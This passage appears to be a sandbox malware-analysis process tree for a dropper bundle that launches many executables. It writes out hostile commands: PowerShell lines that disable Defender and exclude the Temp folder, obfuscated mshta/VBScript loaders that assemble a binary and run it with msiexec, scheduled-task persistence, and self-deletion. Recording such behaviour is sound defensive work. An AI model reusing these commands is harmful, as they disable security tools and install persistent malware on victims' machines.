- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed096a1bff61.exeWed096a1bff61.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4108 -
C:\Users\Admin\AppData\Roaming\3045238.exe"C:\Users\Admin\AppData\Roaming\3045238.exe"8⤵
- Executes dropped EXE
PID:5360
-
-
C:\Users\Admin\AppData\Roaming\8467150.exe"C:\Users\Admin\AppData\Roaming\8467150.exe"8⤵
- Executes dropped EXE
PID:5544
-
-
C:\Users\Admin\AppData\Roaming\7780882.exe"C:\Users\Admin\AppData\Roaming\7780882.exe"8⤵
- Executes dropped EXE
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\3898642.exe"C:\Users\Admin\AppData\Roaming\3898642.exe"8⤵
- Executes dropped EXE
PID:5836
-
-
C:\Users\Admin\AppData\Roaming\4437894.exe"C:\Users\Admin\AppData\Roaming\4437894.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1228
-
-
C:\Users\Admin\AppData\Roaming\4624655.exe"C:\Users\Admin\AppData\Roaming\4624655.exe"8⤵
- Executes dropped EXE
PID:5104
-
-
C:\Users\Admin\AppData\Roaming\3496843.exe"C:\Users\Admin\AppData\Roaming\3496843.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:5648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 2489⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4588 -s 15648⤵
- Program crash
PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4740 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
- Checks whether UAC is enabled
PID:684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:5156
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
- Checks whether UAC is enabled
PID:5944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:5720
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:6312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:6468
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:6812
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
PID:5932
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:4136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 7968⤵
- Program crash
PID:4516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8168⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8448⤵
- Program crash
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8008⤵
- Program crash
PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"7⤵PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:5084
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
PID:6592 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"9⤵
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
PID:5168 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee010⤵
- Loads dropped DLL
PID:5252 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9011⤵
- Loads dropped DLL
PID:3876
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2016 /prefetch:810⤵
- Loads dropped DLL
PID:7356
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2740 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
PID:7484
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2656 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
PID:7468
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2004 /prefetch:810⤵
- Loads dropped DLL
PID:7348
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1936 /prefetch:210⤵
- Loads dropped DLL
PID:7340
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3084 /prefetch:810⤵
- Loads dropped DLL
PID:8076
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3388 /prefetch:210⤵PID:8340
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2852 /prefetch:810⤵PID:8844
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2880 /prefetch:810⤵
- Modifies system certificate store
PID:3848
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3832 /prefetch:810⤵PID:4620
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2832 /prefetch:810⤵PID:200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4172 -s 15448⤵
- Program crash
PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:4540 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:4724
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3280
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:9312
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:9728
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:6256
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:6268
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:6400
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6606⤵
- Program crash
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6806⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6486⤵
- Program crash
PID:5432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6646⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 9086⤵
- Program crash
PID:4240
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
PID:2104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exe" & exit6⤵PID:6468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09c42cad92c20f79.exe" /f7⤵
- Loads dropped DLL
- Kills process with taskkill
PID:6568
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:3480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 2087⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3536
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1696
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
PID:3964
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
PID:752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
PID:2420 -
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
PID:6804
-
-
C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"6⤵PID:624
-
-
C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"6⤵
- Checks whether UAC is enabled
PID:3844
-
-
C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"6⤵PID:4680
-
-
C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
PID:6492 -
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵PID:4848
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵PID:5148
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:4904
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵PID:6156
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵PID:8736
-
